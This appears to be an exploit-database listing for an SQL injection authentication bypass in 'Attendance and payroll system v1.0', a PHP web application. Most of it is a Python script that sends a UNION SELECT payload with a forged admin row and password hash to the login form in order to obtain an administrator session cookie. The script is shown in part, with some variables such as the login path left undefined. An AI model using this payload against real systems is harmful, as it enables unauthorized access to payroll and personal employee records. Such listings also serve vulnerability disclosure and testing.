Attendance and payroll system v1.0 sqli authentication bypass Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2022-03-07 |
Type : webapps |
Platform : php
This exploit / vulnerability Attendance and payroll system v1.0 sqli authentication bypass is for educational purposes only and if it is used you will do on your own risk!
payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# Check for arguments
if len(sys.argv) < 2 or '-h' in sys.argv:
print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1")
sys.exit()
# Bypass Authentication
target = sys.argv[1]
print("[+] Extracting Administrator cookie using SQLi ...")
sess = requests.Session()
try:
sess.get(target + index_path,headers=headers, verify=False)
sess.post(target + login_path, data=payload, headers=headers,verify=False)
except ConnectionError:
print('[-] We were unable to establish a connection')
sys.exit()